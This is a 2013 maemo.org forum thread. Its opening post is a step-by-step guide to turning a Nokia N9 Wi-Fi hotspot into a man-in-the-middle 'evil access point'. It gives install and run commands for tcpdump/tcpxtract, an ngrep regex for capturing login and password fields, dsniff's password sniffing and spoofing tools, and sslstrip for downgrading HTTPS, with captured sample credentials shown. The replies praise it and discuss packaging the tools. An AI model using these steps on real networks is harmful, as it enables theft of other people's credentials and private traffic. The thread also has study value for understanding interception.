[HOWTO]: the n9 as an evil access point #mitm #ngrep #dsniff #tcpdump #sslstrip - maemo.org

Active Topics

Camera phone competition March 2023 "Endless" (35)
to General by Maemish - 1 day, 20 hrs ago
TLS 1.2 for N9 is ready (28)
to MeeGo / Harmattan by smartblu9 - 1 day, 21 hrs ago
Maemo repository (3)
to Community by torsen - 2 days, 13 hrs ago
Error after installing Leste on sdcard (11)
to Maemo 7 / Leste by Maemish - 3 days, 11 hrs ago
Introducing ubiboot N9 (multiboot OS loader) (1,393)
to Alternatives by smatkovi - 4 days, 17 hrs ago
more...

Thread Tools

	dadaniel	2013-01-31 , 23:42
	Posts: 20 \| Thanked: 46 times \| Joined on Apr 2012 @ Austria	#1

the n9 as an evil access point #mitm

Prelude: I used it in all these tools for development and privat use, e.g. you shouldn't use it in a coffee-shop, call your hotspot "Free-Wifi" and turn the encryption off :P

The last month I looked for a way to use my n9 as package sniffer and I figured out some usefull stuff ...

... my train of thought was - how can I sniff whatever it's transmitted through my stock wifi-hotspot (joikuspot) ...

... so here's a guideline of what I got working and how it works:

mitm

My device:

Nokia n9, Linux RM 696 2.6.32.54-dfl-161-20121301 open mode, meego Harmattan PR1.3

Pre-dependencies:

opensh_1.00_armel
enable rzr’s repository (setup repository)

I AM WORKING IN OPEN MODE, SO I DONT KNOW IF IT WORKS WITH THE STOCK KERNEL!!!

1. tcpdump + tcpxtract
2. ngrep
3. dsniff [dsniff itself]
4. ssldump?

1. tcpdump + tcpxtract:

tcpdump is a very powerful package analyzer - you can dump nearly all traffic with this tool ...

tcpxtract is a tool to rebuild data from tcpdump-pcap files...

let's install the packages [and dependencies]:

apt-get install tcpdump libpcap0.8

I took the tcpxtract_1.0.1-5_armel package out of the debian repository.

dpkg -i tcpxtract_1.0.1-5_armel.deb

now fire up the wifi hotspot, connect with a client and let the magic begin:

mkdir tcpxtract_out/
tcpdump -i wlan0 -n -s 1500 -w tcpdump_http.pcap port 80

# we are starting tcpdump on interface [-i] wlan0, set the snaplen to 1500 [-s], don't convert addresses to names [-n] and listen only on port 80 [port 80]

open a website on the client ... tcpdump will capture it.

when you think you are finished, kill tcpdump [crtl+c]

now we will convert the captured traffic:

/home/user/dev/tcpplay # tcpxtract -f tcpdump_http.pcap -o tcpxtract_out/
Found file of type "html" in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000000.html
Found file of type "png" in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000001.png
Found file of type "png" in session [82.150.199.80:20480 -> 192.168.20.20:25055], exporting to tcpxtract_out/00000002.png
Found file of type "png" in session [192.168.20.20:26079 -> 82.150.199.80:20480], exporting to tcpxtract_out/00000003.png

...

...

Found file of type "png" in session [92.122.212.57:20480 -> 192.168.20.20:30431], exporting to tcpxtract_out/00000021.png

it looks like this.

I LIKE!

2. ngrep

ngrep is a very powerful tool as well - you can analyze traffic live...

I'm going to show you how to filter the traffic by some regular expressions to look for logins:

first install the necessary dependencies and ngrep itself:

apt-get install lipcap0.8

here's ngrep_1.45.ds2-9_armel [from debian repository]

dpkg -i ngrep ngrep_1.45.ds2-9_armel.deb

now fire up the wifi hotspot, connect with a client and let the magic begin [again

/home/user/dev/sniffer # ngrep '[&\s?](?:login|user(?:name|)|p(***(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)' -q -i -d gprs0 port 80 or port 25 or port 110 -l
interface: gprs0 (123.123.123.123/255.255.255.255)
filter: (ip or ip6) and ( port 80 or port 25 or port 110 )
match: [&\s?](?:login|user(?:name|)|p(***(?:word|wd|)|w|wd))[\s:=]\s?([^&\s]*)

T 123.123.123.123:61342 -> 82.150.199.80:80 [AP]
log=ohyes&pwd=itworks&wp-submit=Log+In&redirect_to=http%3A%2F%2Fwww.true-binary.com%2Fwp-admin%2F&testcookie=1

# we are starting ngrep with a regular expression filter, tell it to be quiet [-q], to ignore case [-i], to use interface gprs0 [-d] (i had segment faults when I started it on wlan0 ... from time to time), -l to make the stdout line buffered [-l] (usefull when capturing to a file {2>&1 >ngrep.log}) and filter the traffic by ports [port 80 or port 25 or port 110]

... What it doesn't do is capturing htaccess logins, I use dsniff for it.

3. dsniff

dsniff? - omg, it's awesome! it includes:

arpspoof - Send out unrequested (and possibly forged) arp replies.
dnsspoof - forge replies to arbitrary DNS address / pointer queries on the Local Area Network.
dsniff - password sniffer for several protocols.
filesnarf - saves selected files sniffed from NFS traffic.
macof - flood the local network with random MAC addresses.
mailsnarf - sniffs mail on the LAN and stores it in mbox format.
msgsnarf - record selected messages from different Instant Messengers.
sshmitm - SSH monkey-in-the-middle. proxies and sniffs SSH traffic.
sshow - SSH traffic analyser.
tcpkill - kills specified in-progress TCP connections.
tcpnice - slow down specified TCP connections via "active" traffic shaping.
urlsnarf - output selected URLs sniffed from HTTP traffic in CLF.
webmitm - HTTP / HTTPS monkey-in-the-middle. transparently proxies.
webspy - sends URLs sniffed from a client to your local browser (requires libx11-6 installed).

dsniff does have some more dependencies than the other tools I described:

I took the libdb4.6_4.6.21-16_armel and libnids1.21_1.23-2_armel from the debian repository.

Here's dsniff_2.4b1+debian-18_armel

apt-get install libnet1 libpcap0.8 libssl0.9.8 openssl

dpkg -i libdb4.6_4.6.21-16_armel.deb

dpkg -i libnids1.21_1.23-2_armel.deb

dpkg -i dsniff_2.4b1+debian-18_armel.deb

whooop! - should be working now

dsniff itself is very simple to use - it has a build-in filter. I used it to sniff the authentication for htaccess logins as well as ftp logins:

/home/user/dev/sniffer # dsniff -m -s 1500 -i gprs0
dsniff: listening on gprs0

-----------------
01/31/13 10:45:02 tcp 123.123.123.123.61056 -> p111.111.111.111.some.isp.com.80 (http)
GET / HTTP/1.0
host: server.idonttellyou.com
authorization: Basic dGhpc2lzOmh0YWNjZXNzZHVtcA== [thisis:htaccessdump]

-----------------
01/31/13 10:47:22 tcp 123.123.123.123.57838 -> 82.150.199.80.21 (ftp)
USER thisis
PASS ftpdump

# we are starting dsniff with automatic protocol detection [-m], set the snaplen to 1500 [-s] and listen on interface gprs0 [-i] ... again I got segment faults when listening on wlan0.

4. sslstrip?

sslstrip strips down your https connections to http ...

... I found a way to pipe your local connection through sslstrip, but not with the hotspot connected client.

All I did was to modify my APN connection - I activated the http_proxy on 127.0.0.1 and port 10000, and changed a gconf setting (gconftool-2 -t string -s /system/proxy/mode "manual") - deactivate and activate the connection again and fire up sslstrip.

An alternative for testing is to set the http proxy in firefox.

What I figured out was: The Joikuspot doesn't use the APN entry from the phone settings, because I tried to add a second APN with some changed settings and it won't show up in the properties of Joikuspot. - Maybe that's why it doesn't take the proxy settings from the APN ... anyway, I'm still working on a workaround!

Here's sslstrip-0.9 (taken from http://www.thoughtcrime.org/)

/home/user/dev/sniffer/# apt-get install python-twisted-web

/home/user/dev/sniffer # tar xzf sslstrip-0.9.tar.gz && cd sslstrip-0.9

/home/user/dev/sniffer/sslstrip-0.9 # python setup.py build
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
Cleaning up...
/home/user/dev/sniffer/sslstrip-0.9 # python setup.py install
running install
running build
running build_py
running build_scripts
copying and adjusting sslstrip/sslstrip -> build/scripts-2.6
running install_lib
running install_scripts
copying build/scripts-2.6/sslstrip -> /usr/local/bin
changing mode of /usr/local/bin/sslstrip to 755
running install_data
running install_egg_info
Removing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Writing /usr/local/lib/python2.6/dist-packages/sslstrip-0.9.egg-info
Cleaning up...
/home/user/dev/sniffer/sslstrip-0.9 # ln -s /usr/local/bin/sslstrip /usr/bin/

/home/user/dev/sniffer/sslstrip-0.9 # gconftool-2 -t string -s /system/proxy/mode "manual"

/home/user/dev/sniffer/sslstrip-0.9 # sslstrip -l 10000 -w ../sslstrip.log &

/home/user/dev/sniffer/sslstrip-0.9 # tail -f ../sslstrip.log

2013-01-31 23:57:56,683 SECURE POST Data (www.facebook.com):
lsd=AVpjTuuG&email=thisis%40just.an&pass=example&default_persistent=0&charset_test=%E2%82%AC%2C%C2 %B4%2C%E2%82%AC%2C

... I also got the webmitm/mitmproxy running (fakes SSL-certifications, but as it's not a very efficient and elegant way to work, so I won't explain it)

cheers!

__________________
------------------------------------------------------------------------------
-- www.true-binary.com
------------------------------------------------------------------------------
-- aptitude -vvvvvv moo
-- What is it? It's an elephant being eaten by a snake, of course.
------------------------------------------------------------------------------

Last edited by dadaniel; 2013-01-31 at 23:48.

Quote & Reply |

The Following 19 Users Say Thank You to dadaniel For This Useful Post:
Arie, bibek, brkn, death_jax, dzano, Jordi, juiceme, ladoga, lorenzo, mariusmssj, mr_pingu, ranbaxy, reinob, shanttu, shawnjefferson, smoothc, thedead1440, tortoisedoc

Arie	2013-02-01 , 04:20
Posts: 1,539 \| Thanked: 1,604 times \| Joined on Oct 2011 @ With my N9	#2

This is an awesome Post... Why are people overlooking it?

__________________
Arie|www.everythingn9.com|Nokia N9 64GB x2|Nokia N950

@everythingn9

Temporary Inception Fix

Times Banned from TMO: 4

Quote & Reply |

	dadaniel	2013-02-01 , 09:43
	Posts: 20 \| Thanked: 46 times \| Joined on Apr 2012 @ Austria	#3

Originally Posted by Arie

This is an awesome Post... Why are people overlooking it?

thanks

... maybe because it's not an "app" :P

Quote & Reply |

The Following User Says Thank You to dadaniel For This Useful Post:
kalilucho

soryuuha	2013-02-01 , 10:21
Posts: 771 \| Thanked: 393 times \| Joined on Feb 2012	#4

packet sniffer tool on n9 whoa :shock:

need to know if this will work on stock kernel :<

__________________
5800XMN8808N9

Quote & Reply |

	dadaniel	2013-02-01 , 11:41
	Posts: 20 \| Thanked: 46 times \| Joined on Apr 2012 @ Austria	#5

Originally Posted by soryuuha

packet sniffer tool on n9 whoa :shock:

need to know if this will work on stock kernel :<

It 'should' work, but I would try it with inception/opensh - these tools don't need any kernel based modules.

Give it a try and tell me about it

cheers

Quote & Reply |

kskoda	2013-03-01 , 07:53
Posts: 20 \| Thanked: 17 times \| Joined on Nov 2011 @ Zagreb, Croatia	#6

Originally Posted by dadaniel

[SIZE="4"]

All I did was to modify my APN connection - I activated the http_proxy on 127.0.0.1 and port 10000, and changed a gconf setting (gconftool-2 -t string -s /system/proxy/mode "manual") - deactivate and activate the connection again and fire up sslstrip.

How did you activate proxy?

Quote & Reply |

	www.rzr.online.fr	2013-03-01 , 08:06
	Posts: 1,348 \| Thanked: 1,863 times \| Joined on Jan 2009 @ fr/35/rennes	#7

added dante and sslstrip to shared repo ... dsc link for others are welcome too

__________________
Current obsession:

https://purl.org/rzr/abandonware

Please help to list all maemo existing apps :

https://github.com/abandonware/aband...ment-578143760

https://wiki.maemo.org/Apps#

I am looking for " 4 inch TFT LCD display screen " for Nokia n950 HandSet

http://rzr.online.fr/q/lcd

Also, I need online storage to archive files :

http://db.tt/gn5Qffd6#

https://my.pcloud.com/#page=register...e=g8ikZmcfEJy#

Last edited by www.rzr.online.fr; 2013-03-01 at 20:47.

Quote & Reply |

	coderus	2013-03-01 , 08:40
	Posts: 6,436 \| Thanked: 12,701 times \| Joined on Nov 2011 @ Ängelholm, Sweden	#8

checked dante-client, not working. configured /etc/dante.conf, started socksify /usr/bin/grob -> process freezed and nothing happened

__________________
Telegram | Openrepos | GitHub | Revolut donations

Quote & Reply |

	www.rzr.online.fr	2013-03-01 , 20:19
	Posts: 1,348 \| Thanked: 1,863 times \| Joined on Jan 2009 @ fr/35/rennes	#9

thx for reporting ,feel free to branch it from obs and fix it

added dsniff among others ...

apt-get install tcpdump tcpxtract ngrep ssldump

Please check everything is there and confirm it is usable

Last edited by www.rzr.online.fr; 2013-03-03 at 14:22.

Quote & Reply |

« Previous Thread | Next Thread »

Forum Jump

All times are GMT. The time now is 07:08.

Active Topics

Camera phone competition March 2023 "Endless" (35)

TLS 1.2 for N9 is ready (28)

Maemo repository (3)

Error after installing Leste on sdcard (11)

Introducing ubiboot N9 (multiboot OS loader) (1,393)

Notices